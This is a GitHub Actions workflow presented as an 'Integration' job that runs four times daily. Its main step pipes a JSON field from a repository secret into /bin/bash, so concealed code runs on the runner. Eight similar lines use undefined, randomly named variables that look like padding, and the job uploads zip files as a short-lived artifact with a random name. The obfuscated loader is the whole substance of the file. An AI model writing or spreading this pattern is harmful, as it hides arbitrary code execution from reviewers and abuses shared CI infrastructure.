name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '46 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          yn6: ${{ secrets.yn6 }}
        run: |
          printf '%s' "$yn6" | jq -r .gn68789 | /bin/bash
          printf '%s' "$ijnng45" | jq -r .etz51 | /bin/bash
          echo $jry777 | jq -r .rzmb3 | /bin/bash
          printf '%s' "$difd19743" | jq -r .aef20488 | /bin/bash
          echo $emoc25 | jq -r .ro48 | /bin/bash
          printf '%s' "$zk49" | jq -r .gxjry523 | /bin/bash
          echo $q0 | jq -r .j19330 | /bin/bash
          echo $lmo36762 | jq -r .cgcxh51650 | /bin/bash
          printf '%s' "$st81148" | jq -r .t39 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: wfc1jJ3x
          path: "*.zip"
          retention-days: 1
